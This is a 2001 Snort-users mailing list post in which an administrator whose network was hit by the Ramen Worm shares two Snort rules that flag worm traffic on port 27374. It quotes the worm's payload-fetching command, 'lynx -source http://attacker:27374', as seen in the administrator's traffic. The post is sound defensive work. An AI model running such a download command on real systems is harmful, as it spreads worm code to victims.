[Snort-users] Ramen Worm rules

Andrew Daviel andrew at ...523...
Thu Jan 18 13:02:18 EST 2001


We were just hit by the Ramen Worm
see http://members.home.net/dtmartin24/ramen_worm.txt

This is my attempt for a couple of rules. My tcpdump data isn't long
enough to match the content, actually I only have "GE" but I know it's
a GET - actually from "lynx -source http://attacker:27374"

alert tcp $HOME_NET 27374 -> !$HOME_NET any (msg:"Ramen Worm server active
on network";flags:PA;content:"GET ")
alert tcp $HOME_NET any -> !$HOME_NET 27374 (msg:"Ramen Worm
downloading";flags:PA;content:"GET ")


-- 
Andrew Daviel, TRIUMF, Canada
Tel. +1 (604) 222-7376
security at ...524...





More information about the Snort-users mailing list